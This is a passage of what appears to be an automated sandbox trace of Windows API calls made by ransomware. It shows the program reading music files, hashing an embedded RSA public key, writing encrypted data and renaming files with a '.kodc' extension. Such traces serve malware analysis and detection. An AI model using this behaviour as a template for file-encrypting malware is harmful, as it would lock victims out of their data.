(HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb63a0 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.784] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0xbfd6, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xbfd6, lpOverlapped=0x0) returned 1 [0101.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0101.785] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbfdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.785] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.785] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.786] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.786] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.786] CloseHandle (hObject=0x5cc) returned 1 [0101.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.788] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\d0KBQhm-SGZjCX4Wq_U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\d0kbqhm-sgzjcx4wq_u.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\d0KBQhm-SGZjCX4Wq_U.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\d0kbqhm-sgzjcx4wq_u.wav.kodc")) returned 1 [0101.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.788] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.789] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d414780, ftCreationTime.dwHighDateTime=0x1d5c116, ftLastAccessTime.dwLowDateTime=0xade23310, ftLastAccessTime.dwHighDateTime=0x1d5c198, ftLastWriteTime.dwLowDateTime=0xade23310, ftLastWriteTime.dwHighDateTime=0x1d5c198, nFileSizeHigh=0x0, nFileSizeLow=0x16f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LdKdxLYR8KiGRAR71qNv.wav", cAlternateFileName="LDKDXL~1.WAV")) returned 1 [0101.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.789] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\LdKdxLYR8KiGRAR71qNv.wav") returned=".wav" [0101.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\LdKdxLYR8KiGRAR71qNv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\ldkdxlyr8kigrar71qnv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.790] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=5876) returned 1 [0101.790] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.792] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.792] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.793] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.793] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x16f4, lpOverlapped=0x0) returned 1 [0101.793] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.793] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.794] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.794] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.794] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.794] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.794] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.795] GetLastError () returned 0x0 [0101.795] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.795] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.795] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.795] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.795] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16f0) returned 0x9ba8d90 [0101.795] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb63a0 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb63e8 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.795] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8190 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8178 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8178 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.796] GetCurrentThreadId () returned 0x42c [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba88a8 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.797] GetCurrentThreadId () returned 0x42c [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: 